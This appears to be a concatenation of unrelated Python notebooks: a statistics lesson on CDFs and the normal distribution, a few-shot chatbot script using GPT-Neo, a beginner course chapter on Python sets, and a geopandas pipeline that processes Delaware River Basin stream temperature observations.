plt.plot(range(int(np.min(ls_age)), int(np.max(ls_age))), cdf_age)
plt.grid()
```
## Use Seaborn or Matplotlib to plot CDF of Age
```
sns.distplot(df['Age'].dropna(), hist_kws=dict(cumulative=True), kde_kws=dict(cumulative=True))
df['Age'].dropna().hist(cumulative=True, density=True)
```
## More about PDF
```
sns.violinplot(x="Sex", y="Age", data=df)
```
## Normal Distribution
- When we plot the histogram or PDF of an array, it may have a bell shape
- A distribution with this shape is called Normal
```
import numpy as np
import seaborn as sns
# Generate 1000 samples with 60 as its mean and 10 as its std
a = np.random.normal(60, 10, 1000)
sns.distplot(a, hist=True, kde=True, bins=20)
```
## Activity:
- The instructor of DS graded the students' final exam. He reports that the mean was 60 (on a scale of 100) with a standard deviation of 10. What is the probability that a student got more than 70?
```
from scipy.stats import norm
print(norm.sf(70, loc=60, scale=10))
# or
1 - norm.cdf(70, loc=60, scale=10)
```
## Normal Distribution Properties:
When the data is Normally distributed:
- 68% of the data is captured within one standard deviation from the mean.
- 95% of the data is captured within two standard deviations from the mean.
- 99.7% of the data is captured within three standard deviations from the mean.
<br><img src="http://www.oswego.edu/~srp/stats/images/normal_34.gif" /><br>
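These three percentages are easy to verify with `scipy.stats.norm`; a quick check using the exam example from above (mean 60, std 10):

```python
from scipy.stats import norm

mu, sigma = 60, 10  # the exam example
coverage = []
for k in [1, 2, 3]:
    # P(mu - k*sigma <= X <= mu + k*sigma)
    p = norm.cdf(mu + k * sigma, loc=mu, scale=sigma) - norm.cdf(mu - k * sigma, loc=mu, scale=sigma)
    coverage.append(p)
    print(f"within {k} std: {p:.4f}")
# within 1 std: 0.6827, within 2 std: 0.9545, within 3 std: 0.9973
```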
## Activity:
- Show that about 68% of the values in `a` fall in the [50, 70] range
```
norm.cdf(70, loc=60, scale=10) - norm.cdf(50, loc=60, scale=10)
```
## If we scale the Normal distribution, the result has zero mean and unit std
```
b = (a - 60)/10
sns.distplot(b, hist=True, kde=True, bins=20)
np.mean(b)
np.std(b)
# b has a z-distribution
```
## Z-Distribution
- When the samples of our numerical array are Normal with arbitrary mean and std
- If we scale each element by subtracting the mean and dividing by the std, the new array follows a Normal distribution with zero mean and std of 1
- Z-distribution is another name for the standard Normal distribution
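A small sketch of this standardization on freshly generated data, confirming that the scaled array has (approximately) zero mean and unit standard deviation:

```python
import numpy as np

rng = np.random.default_rng(0)
a = rng.normal(60, 10, 1000)  # Normal samples with arbitrary mean and std

# standardize: subtract the sample mean, divide by the sample std
z = (a - a.mean()) / a.std()

print(z.mean(), z.std())  # approximately 0 and 1
```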
```
from utils.utils import load_model
from prompts.generic_prompt import load_prefix, load_prefix_by_category, generate_response_interactive
from prompts.image_chat import convert_sample_to_shot_IC_prefix_interact, convert_sample_to_shot_IC_interact
import pprint
import random
pp = pprint.PrettyPrinter(indent=4)
args = type('', (), {})()
args.multigpu = False
device = 0
## To use GPT-Jumbo (178B), set this to True and input your API key
## Visit https://studio.ai21.com/account for more info
## AI21 provides 10K tokens per day, so you can only try a few turns
api = False
api_key = ''
## This is the config dictionary used to select the template converter
mapper = {
"IC": {"shot_converter":convert_sample_to_shot_IC_prefix_interact,
"shot_converter_inference": convert_sample_to_shot_IC_interact,
"file_data":"data/image_chat/","with_knowledge":False,
"shots":{1024:[0,1,5],2048:[0,1,10]},"max_shot":{1024:5,2048:10},
"shot_separator":"\n\n",
"meta_type":"all_turns_category","gen_len":50,"max_number_turns":2},
}
if api:
    from transformers import AutoTokenizer
    tokenizer = AutoTokenizer.from_pretrained("gpt2")
    model = None
    max_seq = 2048
else:
    ## Load LM and tokenizer
    ## You can try different LMs:
    ## gpt2, gpt2-medium, gpt2-large, gpt2-xl,
    ## EleutherAI/gpt-neo-1.3B, EleutherAI/gpt-neo-2.7B,
    ## EleutherAI/gpt-j-6B
    ## the larger the better
    model, tokenizer, max_seq = load_model(args, "EleutherAI/gpt-neo-1.3B", device)
## sample_times is used to sample different prompts
## we select the zeroth element of the list
## to change the behaviour you could try different prompts
prefix_dict = load_prefix_by_category(tokenizer=tokenizer,
shots_value=mapper["IC"]["shots"][max_seq],
shot_converter=mapper["IC"]["shot_converter"],
file_shot=mapper["IC"]["file_data"]+"valid.json",
name_dataset="IC", with_knowledge=mapper["IC"]["with_knowledge"],
shot_separator=mapper["IC"]["shot_separator"],sample_times=2)[0]
max_number_turns = mapper["IC"]["max_number_turns"]
prompt_sytle = {}
for sty in prefix_dict.keys():
    sty_name = sty.replace(" ","-").replace("(","").replace(")","").replace(",","").split("_")[0]
    prompt_sytle[sty_name] = prefix_dict[sty]
styles = ", ".join(list(prompt_sytle.keys()))
print(f"The possible styles are \n {styles}")
dialogue = {"dialogue":[],"personalities":""}
while True:
    user_utt = input(">>> ")
    dialogue["dialogue"].append([user_utt, ""])
    print("Choose a style from the list!")
    style = input(">>> ")
    if style not in prompt_sytle.keys():
        print("You have to choose a style from the list!")
        print("This time a random style is selected!")
        style = random.sample(list(prompt_sytle.keys()), 1)[0]
        print(f"You got the {style} style!")
    dialogue["personalities"] = style
    prefix_shots = prompt_sytle[style]
    prefix = prefix_shots.get(mapper["IC"]["max_shot"][max_seq])
    response = generate_response_interactive(model, tokenizer, shot_converter=mapper["IC"]["shot_converter_inference"],
                                             dialogue=dialogue, prefix=prefix,
                                             device=device, max_number_turns=mapper["IC"]["max_number_turns"],
                                             with_knowledge=mapper["IC"]["with_knowledge"],
                                             meta_type=mapper["IC"]["meta_type"], gen_len=50,
                                             beam=1, max_seq=max_seq, eos_token_id=198,
                                             do_sample=True, multigpu=False, api=api, api_key=api_key)
    print(f"FSB ({style}) >>> {response}")
    dialogue["dialogue"][-1][1] = response
    dialogue["dialogue"] = dialogue["dialogue"][-max_number_turns:]
## USE THIS ONLY WITH LOCAL MODELS ==> OTHERWISE THE API QUOTA RUNS OUT IMMEDIATELY
max_number_turns = mapper["IC"]["max_number_turns"]
prompt_sytle = {}
for sty in prefix_dict.keys():
    sty_name = sty.replace(" ","-").replace("(","").replace(")","").replace(",","").split("_")[0]
    prompt_sytle[sty_name] = prefix_dict[sty]
styles = ", ".join(list(prompt_sytle.keys()))
dialogue = {"dialogue":[],"personalities":""}
while True:
    user_utt = input(">>> ")
    dialogue["dialogue"].append([user_utt, ""])
    items = list(prompt_sytle.keys())  # list of style names
    random.shuffle(items)  # shuffle the styles a bit
    for id_r, style in enumerate(items):
        dialogue["personalities"] = style
        prefix_shots = prompt_sytle[style]
        prefix = prefix_shots.get(mapper["IC"]["max_shot"][max_seq])
        response = generate_response_interactive(model, tokenizer, shot_converter=mapper["IC"]["shot_converter_inference"],
                                                 dialogue=dialogue, prefix=prefix,
                                                 device=device, max_number_turns=max_number_turns,
                                                 with_knowledge=mapper["IC"]["with_knowledge"],
                                                 meta_type=mapper["IC"]["meta_type"], gen_len=50,
                                                 beam=1, max_seq=max_seq, eos_token_id=198,
                                                 do_sample=True, multigpu=False, api=api, api_key=api_key)
        print(f"FSB ({style}) >>> {response}")
        if id_r == 10: break
    dialogue["dialogue"][-1][1] = response
    dialogue["dialogue"] = dialogue["dialogue"][-max_number_turns:]
```
# Chapter 7 - Sets
This chapter will introduce a different kind of container: **sets**. Sets are unordered collections with no duplicate entries. You might wonder why we need different types of containers. We will postpone that discussion until chapter 8.
**At the end of this chapter, you will be able to:**
* create a set
* add items to a set
* extract/inspect items in a set
**If you want to learn more about these topics, you might find the following links useful:**
* [Python documentation](https://docs.python.org/3/tutorial/datastructures.html#sets)
* [A tutorial on sets](https://www.learnpython.org/en/Sets)
If you have **questions** about this chapter, please contact us **(cltl.python.course@gmail.com)**.
## 1. How to create a set
It's quite simple to create a set.
```
a_set = {1, 2, 3}
a_set
empty_set = set() # you have to use set() to create an empty set! (we will see why later)
print(empty_set)
```
* Curly brackets surround sets, and commas separate the elements in the set
* A set can be empty (use set() to create it)
* Sets do not allow **duplicates**
* Sets are **unordered** (the order in which you add items is not important)
* A set can **only contain immutable objects** (for now, that means only **strings** and **integers** can be added)
* A set cannot contain **mutable objects**, hence no lists or sets
Please note that sets do not allow **duplicates**. In the example below, the integer **1** will only be present once in the set.
```
a_set = {1, 2, 1, 1}
print(a_set)
```
Please note that sets are **unordered**. This means that when you print a set, it may look different from how you created it:
```
a_set = {1, 3, 2}
print(a_set)
```
This also means that you can check if two sets are the same even if you don't know the order in which items were put in:
```
{1, 2, 3} == {2, 3, 1}
```
Please note that sets can **only contain immutable objects**. Hence the following example will work, since we are only adding immutable objects:
```
a_set = {1, 'a'}
print(a_set)
```
But the following example will result in an error, since we are trying to create a set with a **mutable object**
```
a_set = {1, []}
```
## 2. How to add items to a set
The most common way of adding an item to a set is by using the **add** method. The **add** method has one positional parameter, namely the item you are going to add to the set, and it returns None. Beware: since **add** returns None, reassigning the result (as in the second example below) replaces your set with None.
```
a_set = set()
a_set.add(1)
print(a_set)
a_set = set()
a_set = a_set.add(1)
print(a_set)
```
## 3. How to extract/inspect items in a set
When you use sets, you usually want to **compare the elements of different sets**, for instance, to determine how much overlap there is or how many of the items in set1 are not members of set2. Sets can be used to carry out mathematical set operations like **union**, **intersection**, **difference**, and **symmetric difference**. Please take a look at [this website](https://www.programiz.com/python-programming/set) if you prefer a more visual and more complete explanation.
You can ask Python to show you all the set methods by using **dir**. All the methods that do not start with '__' are relevant for you.
```
dir(set)
```
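Before turning to the set methods, note that the simplest way to inspect a set is to test membership with the **in** operator (a small illustrative example; the values are made up):

```
fruit = {'apple', 'banana', 'cherry'}
print('apple' in fruit)      # True
print('mango' in fruit)      # False
print('mango' not in fruit)  # True
```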
You observe that there are many methods defined for sets! Here we explain the two most common methods. We start with the **union** method.
```
help(set.union)
```
Python shows dots (...) for the parameters of the **union** method. Based on the docstring, we learn that we can provide any number of sets, and Python will return the union of them.
```
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
the_union = set1.union(set2)
print(the_union)
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
set3 = {5, 6, 7, 8, 9}
the_union = set1.union(set2, set3)
print(the_union)
```
The **intersection** method works in a similar manner to the **union** method, but returns a new set containing only the elements common to all the sets.
```
help(set.intersection)
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
the_intersection = set1.intersection(set2)
print(the_intersection)
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
set3 = {5, 8, 9, 10}
the_intersection = set1.intersection(set2, set3)
print(the_intersection)
```
Since sets are **unordered**, you can **not** use an index to extract an element from a set.
```
a_set = set()
a_set.add(1)
a_set.add(2)
a_set[0]
```
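If you do need the elements in a fixed order, a common workaround (sketched below) is to convert the set to a sorted list first:

```
a_set = {3, 1, 2}
ordered = sorted(a_set)  # returns a new, sorted list
print(ordered)     # [1, 2, 3]
print(ordered[0])  # 1
# or simply loop over the set when the order does not matter
for item in a_set:
    print(item)
```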
## 4. Using built-in functions on sets
The same range of **functions that operate on lists** also work with sets. We can easily get some simple calculations done with these functions:
```
nums = {3, 41, 12, 9, 74, 15}
print(len(nums)) # number of items in a set
print(max(nums)) # highest value in a set
print(min(nums)) # lowest value in a set
print(sum(nums)) # sum of all values in a set
```
## 5. An overview of set operations
There are many more operations which we can perform on sets. Here is an overview of some of them.
In order to get used to them, please call the **help** function on each of them (e.g., help(set.union)). This will give you the information about the positional parameters, keyword parameters, and what is returned by the method.
```
set_a = {1, 2, 3}
set_b = {4, 5, 6}
an_element = 4
print(set_a)
#do some operations
set_a.add(an_element) # Add an_element to set_a
print(set_a)
set_a.update(set_b) # Add the elements of set_b to set_a
print(set_a)
set_a.pop() # Remove and return an arbitrary set element. How does this compare to the list method pop?
print(set_a)
set_a.remove(an_element) # Remove an_element from set_a
print(set_a)
```
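Besides **union** and **intersection**, the **difference** and **symmetric difference** operations mentioned earlier follow the same pattern; a minimal sketch:

```
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
print(set1.difference(set2))            # {1, 2, 3} -> items in set1 but not in set2
print(set1.symmetric_difference(set2))  # {1, 2, 3, 6, 7, 8} -> items in exactly one of the two sets
```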
Before diving into some exercises, you may want to call the **dir** built-in function again to see an overview of all set methods:
```
dir(set)
```
## Exercises
**Exercise 1:**
Please create an empty set and use the **add** method to add four items to it: 'a', 'set', 'is', 'born'
**Exercise 2:**
Please use a built-in function to **count** how many items your set has
**Exercise 3:**
How would you **remove** one item from the set?
**Exercise 4:**
Please check which items are in both sets:
```
set_1 = {'just', 'some', 'words'}
set_2 = {'some', 'other', 'words'}
# your code here
```
```
# import packages
import pandas as pd
import geopandas as gpd
import geojson
import numpy as np
import os
from shapely.geometry import Point
```
# Import Data
```
# set location of input data files
input_dir = 'input_data'
```
### Segment polylines
```
# read in segment shapefile (simplified to 4 percent with mapshaper and smoothed in ArcGIS) as geodataframe
segment_gdf = gpd.read_file(os.path.join(input_dir,'shapefiles/Segments_subset_4per_smooth.shp'))
```
### Delaware Bay
```
# read in NHD delaware bay shapefile (simplified to 0.6 percent with mapshaper and smoothed in ArcGIS) as geodataframe
delaware_bay_gdf = gpd.read_file(os.path.join(input_dir,'shapefiles/NHDWaterbody_DelawareBay_pt6per_smooth.shp'))
```
### Reservoirs
```
# read in simplified reservoirs shapefile as geodataframe
reservoirs = gpd.read_file(os.path.join(input_dir,'shapefiles/reservoirs_17per.shp'))
# filter out four reservoirs that are not on model segments
reservoirs = reservoirs[(reservoirs.GRAND_ID != 2212) & (reservoirs.GRAND_ID != 1591) & (reservoirs.GRAND_ID != 1584) & (reservoirs.GRAND_ID != 2242)]
# drop index
reservoirs = reservoirs.reset_index(drop=True)
```
### Station locations
```
# list of unique drb sites (coordinate system = NAD1983 = EPSG 4269)
unique_drb_sites = pd.read_csv(os.path.join(input_dir,'unique_drb_sites.csv'), index_col=None)
```
### Temperature observations
```
obs_temp_df_raw = pd.read_csv(os.path.join(input_dir,'obs_temp_drb.csv'), delimiter=',')
```
### Number of observations per year, by source
```
n_obs_annual_source = pd.read_csv(os.path.join(input_dir,'n_obs_per_year_source.csv'), delimiter=',')
```
### Modeled segment outflow
```
seg_outflow = pd.read_csv(os.path.join(input_dir,'seg_outflow.csv'))
```
# Clean and structure data for analysis
### Clean temperature observation data
```
# remove NAs from seg_id_nat column (copy to avoid SettingWithCopyWarning on later assignments)
obs_temp_df_cleaned = obs_temp_df_raw.loc[obs_temp_df_raw['seg_id_nat'].notnull()].copy()
# get # of unique segment ids
obs_temp_seg_id_nat_unique = np.unique(obs_temp_df_cleaned['seg_id_nat'].tolist())
len(obs_temp_seg_id_nat_unique)
# convert date to datetime
obs_temp_df_cleaned['date'] = pd.to_datetime(obs_temp_df_cleaned['date'])
# find single erroneous observation value
obs_temp_df_cleaned.loc[(obs_temp_df_cleaned['date'] == '2019-08-21') & (obs_temp_df_cleaned['seg_id_nat'] == 1764)]
# drop that row from the dataframe
obs_temp_df_cleaned = obs_temp_df_cleaned.drop(labels=307015)
# Set date as index and sort by date
obs_temp_df_cleaned = obs_temp_df_cleaned.set_index(['date'], drop=True)
obs_temp_df_cleaned = obs_temp_df_cleaned.sort_index()
# create new copy of cleaned dataframe
obs_temp_df = obs_temp_df_cleaned.copy()
# convert segment id to integer
obs_temp_df['seg_id_nat'] = obs_temp_df['seg_id_nat'].astype(int)
# create year column based on year index
obs_temp_df['year'] = obs_temp_df.index.year #.astype(int)
# create year-month column
obs_temp_df['year-month'] = obs_temp_df.index.to_period('M')
# create month column
obs_temp_df['month'] = obs_temp_df.index.month
# for each row (i.e. each observation), set observation count to 1
obs_temp_df['obs_count'] = 1
obs_temp_df.head()
# filter observations data to only include observations from 1980-2020
obs_temp_df = obs_temp_df.loc['1980-01-01':'2020-12-31']
obs_temp_df
```
### Generate date list and dataframe for use later to pull segment-specific data
```
# create version of observations dataframe with date (as string) and segment id as indices
obs_temp_daily_count = obs_temp_df.copy()
obs_temp_daily_count.index = obs_temp_daily_count.index.astype(str)
obs_temp_daily_count
# add segment id as second index level (for use later to pull observations for each segment)
obs_temp_daily_count = obs_temp_daily_count.set_index('seg_id_nat', append=True)
obs_temp_daily_count.head()
```
# Process spatial data
### Get list of all segments
```
segment_list = np.unique(segment_gdf['seg_id_nat'].tolist())
segment_list.sort()
```
### Get centroids for stream segments
```
# create copy of dataframe
centroid_gdf = segment_gdf.copy()
# check crs of segment geodataframe
centroid_gdf.crs
# reproject before calculating segment centroids
centroid_gdf = centroid_gdf.to_crs(epsg=6350)
# check crs of segment geodataframe
centroid_gdf.crs
# add column with the midpoint of each segment (interpolate at half the line length; used here as the segment's "centroid")
centroid_gdf['centroid'] = centroid_gdf['geometry'].interpolate(0.5, normalized=True)
centroid_gdf.head()
# reassign the geodataframe geometry to be the centroid column
centroid_gdf = centroid_gdf.set_geometry('centroid')
# revert to geographic crs (WGS 1984)
centroid_gdf = centroid_gdf.to_crs(epsg=4326)
# check that centroid coordinates have been reprojected
centroid_gdf.head()
# create column of only centroid latitude
centroid_gdf['seg_centroid_lat'] = centroid_gdf['centroid'].apply(lambda p: p.y)
centroid_gdf.head()
```
### Extract latitudes of segment centroids
```
# drop all columns except seg_id_nat and centroid
segment_latitudes_df = centroid_gdf.drop(columns=['region','model_idx','InLine_FID','SmoLnFlag','geometry', 'centroid'])
# set segment id as index
segment_latitudes_df = segment_latitudes_df.set_index('seg_id_nat')
segment_latitudes_df.head()
```
### Convert dataframe of unique sites in DRB with monitoring data to geodataframe
```
unique_drb_sites.head()
# convert the dataframe to a geodataframe
unique_drb_sites_gdf = gpd.GeoDataFrame(unique_drb_sites, crs="EPSG:4326", geometry=gpd.points_from_xy(unique_drb_sites.longitude, unique_drb_sites.latitude))
unique_drb_sites_gdf.head()
unique_drb_sites_gdf.shape
ax = segment_gdf.plot(figsize=(30,15))
unique_drb_sites_gdf.plot(ax = ax, markersize=2, color = 'red')
```
# Process temperature observations data
### Transform dataframe of # of observations per year per source
```
# load data w/ number of observations per year, by source
n_obs_annual_source.head()
# pivot into wide format
source_annual_count = n_obs_annual_source.pivot(index='year', columns='source', values='n_obs')
source_annual_count.head()
# create a continuous date range from 1960-2020, at an annual interval
year_index = pd.date_range('01-01-1960', '01-01-2021', freq='A')
# pull only the year associated with each date
year_index = year_index.year
# reindex the dataframe to fill in missing years
# fill nas with 0s
source_annual_count = source_annual_count.reindex(index=year_index, fill_value = 0)
source_annual_count = source_annual_count.fillna(value = 0)
source_annual_count = source_annual_count.astype(int)
source_annual_count.index.rename('year', inplace=True)
source_annual_count = source_annual_count.rename(columns={'Other':'State or other agency'})
source_annual_count = source_annual_count[['USGS', 'State or other agency']]
source_annual_count
```
### Get segment-specific counts of temperature observations for different time steps
##### count of all observations from 1980-2020 for each segment
```
obs_temp_df.head()
# count of all observations from 1980-2020 for each segment
obs_temp_count = obs_temp_df.groupby(['seg_id_nat']).count()
obs_temp_count = obs_temp_count.drop(columns=['subseg_id', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year', 'year-month', 'month'])
obs_temp_count = obs_temp_count.sort_index()
obs_temp_count.index = obs_temp_count.index.astype(int)
obs_temp_count = obs_temp_count.rename(columns={'obs_count':'total_count'})
obs_temp_count
```
##### count of observations in each year (from 1980-2020) for each segment
```
# count of observations in each year, from 1980 - 2020
obs_temp_year_count = obs_temp_df.groupby(['seg_id_nat', 'year']).count()
obs_temp_year_count = obs_temp_year_count.drop(columns=['subseg_id', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year-month', 'month'])
```
##### count of all observations in 2019 for each segment
```
# subset 2019 data from all temperature observations
obs_temp_df_2019 = obs_temp_df.loc['2019-01-01':'2019-12-31']
obs_temp_df_2019
# count of all observations in each month of 2019 for each segment
obs_temp_df_2019_months = obs_temp_df_2019.copy()
obs_temp_df_2019_months['month_name'] = obs_temp_df_2019_months.index.strftime('%B')
obs_temp_count_month_2019 = obs_temp_df_2019_months.groupby(['seg_id_nat','month_name']).count()
obs_temp_count_month_2019 = obs_temp_count_month_2019.drop(columns=['subseg_id','mean_temp_c','min_temp_c','max_temp_c','site_id','year','year-month','month'])
obs_temp_mean_month_2019 = obs_temp_df_2019_months.groupby(['seg_id_nat','month_name']).mean()
obs_temp_mean_month_2019 = obs_temp_mean_month_2019.drop(columns=['min_temp_c','max_temp_c','year','month','obs_count'])
obs_temp_mean_month_2019 = obs_temp_mean_month_2019.rename(columns={'mean_temp_c':'mean_t_c'})
obs_temp_month_2019 = obs_temp_count_month_2019.join(obs_temp_mean_month_2019)
obs_temp_month_2019.head()
# count of all observations on each day in 2019 for each segment
obs_temp_count_2019 = obs_temp_df_2019.groupby(['seg_id_nat']).count()
obs_temp_count_2019 = obs_temp_count_2019.drop(columns=['month', 'year', 'subseg_id', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year-month'])
obs_temp_count_2019 = obs_temp_count_2019.sort_index()
obs_temp_count_2019.index = obs_temp_count_2019.index.astype(int)
obs_temp_count_2019 = obs_temp_count_2019.rename(columns={'obs_count':'total_count'})
obs_temp_count_2019
```
### Get total annual and daily counts of observations
##### annual counts
```
# group observations by year to get total count of observations in each year
obs_annual_count = obs_temp_df.groupby(['year']).count()
obs_annual_count = obs_annual_count.drop(columns=['subseg_id', 'seg_id_nat', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year-month', 'month'])
obs_annual_count = obs_annual_count.rename(columns={'obs_count': 'total_annual_count'})
obs_annual_count.head()
```
##### daily counts
```
# get count of observations on each day from 1980-2019
obs_daily_count = obs_temp_df.groupby(['date']).count()
obs_daily_count = obs_daily_count.drop(columns=['subseg_id', 'seg_id_nat', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year', 'year-month', 'month'])
obs_daily_count = obs_daily_count.rename(columns={'obs_count': 'total_daily_count'})
obs_daily_count
# get count of observations on each day of 2019
obs_daily_count_2019 = obs_daily_count.loc['2019-01-01':'2019-12-31']
obs_daily_count_2019
```
### Format data for matrices
```
# create copy of observations dataframe
all_observations_df = obs_temp_df.copy()
# set year as string type
all_observations_df['year'] = all_observations_df['year'].astype(str)
all_observations_df
```
##### annual time interval
```
# create a dataframe with the segment ids as the columns
matrix_annual_df = pd.DataFrame(columns=segment_list)
# set a date range with annual timesteps from 1980-2020
model_date_rng = pd.date_range('1980', periods=41, freq='A')
# add a column to the dataframe with the set date range
matrix_annual_df['Date'] = model_date_rng
# convert dates to datetime format
matrix_annual_df['Date'] = pd.to_datetime(matrix_annual_df['Date'])
# set date as index
matrix_annual_df = matrix_annual_df.set_index('Date')
# create a column for year
matrix_annual_df['year'] = matrix_annual_df.index.to_period('A')
# set year as index
matrix_annual_df = matrix_annual_df.set_index('year')
# make index type string
matrix_annual_df.index = matrix_annual_df.index.astype(str)
matrix_annual_df.head()
# stack the dataframe columns to indices
matrix_annual_series = matrix_annual_df.stack(dropna=False)
matrix_annual_series
# convert the stacked series to a dataframe with two indices
matrix_annual_stacked = matrix_annual_series.to_frame()
# rename the second index to segment id
matrix_annual_stacked.index = matrix_annual_stacked.index.rename('seg_id_nat', level=1)
matrix_annual_stacked.head()
# get count of observations for each segment in each year
seg_obs_temp_year_count = all_observations_df.groupby(['year','seg_id_nat']).sum()
seg_obs_temp_year_count = seg_obs_temp_year_count.drop(columns=['mean_temp_c','min_temp_c','max_temp_c','month'])
seg_obs_temp_year_count.head()
# add the count for each segment to the matrix
matrix_annual_obs = matrix_annual_stacked.join(seg_obs_temp_year_count, on=['year','seg_id_nat'])
# drop empty column
matrix_annual_obs = matrix_annual_obs.drop(columns=0)
# replace na values with 0 (for 0 observations)
matrix_annual_obs = matrix_annual_obs.fillna(0, axis=0)
matrix_annual_obs.head()
# add column with total count for each segment (over whole period, from 1980-2020)
matrix_annual_obs = matrix_annual_obs.join(obs_temp_count, on=['seg_id_nat'], how='left')
matrix_annual_obs = matrix_annual_obs.fillna(0)
matrix_annual_obs.head()
# create dataframe of segment latitudes, ordered by latitude
segment_latitudes_reindexed = segment_latitudes_df.sort_values(by='seg_centroid_lat')
# reset the index
segment_latitudes_reindexed = segment_latitudes_reindexed.reset_index()
# set the segment id as the second index
segment_latitudes_reindexed = segment_latitudes_reindexed.set_index('seg_id_nat', append=True)
segment_latitudes_reindexed.head()
# make a column storing the first and second index levels as a tuple
segment_latitudes_reindexed['index_tuple'] = segment_latitudes_reindexed.index
# drop the first level of the index
segment_latitudes_reindexed = segment_latitudes_reindexed.droplevel(level=0)
segment_latitudes_reindexed.head()
# add column with zero values named 'rank'
segment_latitudes_reindexed['rank'] = 0
segment_latitudes_reindexed.head()
# fill the rank column with the first value of the index_tuple (to get rank of segment by latitude)
for segment_id in segment_list:
    segment_latitudes_reindexed.loc[segment_id, 'rank'] = segment_latitudes_reindexed['index_tuple'][segment_id][0]
segment_latitudes_reindexed.head()
# sort the dataframe by the segment id
segment_latitudes_reindexed = segment_latitudes_reindexed.sort_index()
# drop the index tuple column
segment_latitudes_reindexed = segment_latitudes_reindexed.drop(columns=['index_tuple'])
segment_latitudes_reindexed.head()
# join the segment latitudes dataframe to the matrix of segment observations
matrix_annual_obs = matrix_annual_obs.join(segment_latitudes_reindexed, on=['seg_id_nat'], how='left')
matrix_annual_obs.head()
# sort the matrix by rank, so that the segment data is ordered by segment latitude
matrix_annual_obs = matrix_annual_obs.sort_values(by='rank')
# sort the matrix by year, so that data is ordered correctly temporally
matrix_annual_obs = matrix_annual_obs.sort_index(level=0, sort_remaining=False)
matrix_annual_obs.head()
```
##### daily time interval - 2019 only
```
# create an empty dataframe with the segment ids as the columns
matrix_daily_2019_df = pd.DataFrame(columns=segment_list)
# set up a date range with a daily timestep for the year 2019
model_daily_2019_date_rng = pd.date_range('2019-01-01', periods=365, freq='D')
# add a date column to the dataframe based on the date range
matrix_daily_2019_df['date'] = model_daily_2019_date_rng
# convert the date to datetime format
matrix_daily_2019_df['date'] = pd.to_datetime(matrix_daily_2019_df['date'])
# set the date as the index
matrix_daily_2019_df = matrix_daily_2019_df.set_index('date')
matrix_daily_2019_df.head()
# stack the dataframe columns to indices
matrix_daily_2019_series = matrix_daily_2019_df.stack(dropna=False)
matrix_daily_2019_series
# create a dataframe with two index levels from the stacked series
matrix_daily_2019_stacked = matrix_daily_2019_series.to_frame()
# rename the second index level 'seg_id_nat'
matrix_daily_2019_stacked.index = matrix_daily_2019_stacked.index.rename('seg_id_nat', level=1)
matrix_daily_2019_stacked.head()
# get count of observations for each segment on each day
seg_obs_temp_daily_count = all_observations_df.groupby(['date','seg_id_nat']).sum()
seg_obs_temp_daily_count = seg_obs_temp_daily_count.drop(columns=['mean_temp_c','min_temp_c','max_temp_c','month'])
seg_obs_temp_daily_count.head()
# join the daily counts to the observation matrix
matrix_daily_2019_obs = matrix_daily_2019_stacked.join(seg_obs_temp_daily_count, on=['date','seg_id_nat'])
# drop empty column
matrix_daily_2019_obs = matrix_daily_2019_obs.drop(columns=0)
# replace na values with 0s
matrix_daily_2019_obs = matrix_daily_2019_obs.fillna(0, axis=0)
matrix_daily_2019_obs.head()
# add a column with the total count for each segment (in 2019)
matrix_daily_2019_obs = matrix_daily_2019_obs.join(obs_temp_count_2019, on=['seg_id_nat'], how='left')
matrix_daily_2019_obs = matrix_daily_2019_obs.fillna(0)
matrix_daily_2019_obs.head()
# pull actual temperature observations
obs_temp_daily_count_temps = all_observations_df.copy()
obs_temp_daily_count_temps = obs_temp_daily_count_temps.set_index('seg_id_nat', append=True)
obs_temp_daily_count_temps = obs_temp_daily_count_temps.drop(columns=['subseg_id','min_temp_c','max_temp_c','site_id','year','year-month','month','obs_count'])
obs_temp_daily_count_temps.head()
# add in temperature for each date for each segment
matrix_daily_2019_obs = matrix_daily_2019_obs.join(obs_temp_daily_count_temps, on=['date','seg_id_nat'])
matrix_daily_2019_obs.head()
# add latitude and latitude-based rank of each segment
matrix_daily_2019_obs = matrix_daily_2019_obs.join(segment_latitudes_reindexed, on=['seg_id_nat'], how='left')
matrix_daily_2019_obs.head()
# sort dataframe by rank
matrix_daily_2019_obs = matrix_daily_2019_obs.sort_values(by='rank')
# sort dataframe by date
matrix_daily_2019_obs = matrix_daily_2019_obs.sort_index(level=0, sort_remaining=False)
matrix_daily_2019_obs.head()
```
# Process modeled segment outflow data
```
seg_outflow.head()
# convert date to datetime format
seg_outflow['date'] = pd.to_datetime(seg_outflow['date'])
# set date as index
seg_outflow = seg_outflow.set_index(['date'], drop=True)
# add year column
seg_outflow['year'] = seg_outflow.index.year
# subset the data to 1981-2009
seg_outflow_81_09 = seg_outflow.loc[(seg_outflow['year'] > 1980) & (seg_outflow['year'] < 2010)]
# compute average modeled outflow for each segment in each year
seg_avg_outflow_81_09 = seg_outflow_81_09.groupby(['year']).mean()
seg_avg_outflow_81_09.head()
# transform the dataframe, so that the segment id is the index
segindex_avg_outflow_81_09 = seg_avg_outflow_81_09.T
# add column with segment id
segindex_avg_outflow_81_09['seg_id_nat'] = segindex_avg_outflow_81_09.index
# convert segment id to integer type
segindex_avg_outflow_81_09['seg_id_nat'] = segindex_avg_outflow_81_09['seg_id_nat'].astype(int)
# add a column with the overall average annual modeled outflow for each segment
segindex_avg_outflow_81_09['avg_ann_flow'] = segindex_avg_outflow_81_09.mean(axis=1)
segindex_avg_outflow_81_09.head()
# subset data to just segment id and average annual modeled segment outflow
segment_maflow = segindex_avg_outflow_81_09[['seg_id_nat','avg_ann_flow']]
segment_maflow = segment_maflow.set_index('seg_id_nat')
segment_maflow.head()
```
# Export data
```
# set location for intermediate output data files
intermediate_output_dir = 'intermediate_output'
# create intermediate output folder if it doesn't already exist
if not os.path.exists(intermediate_output_dir):
    os.mkdir(intermediate_output_dir)
# set location for final output data files
output_dir = '../public/data'
```
### Export spatial data that does not require processing
##### Generate reservoir geojson
```
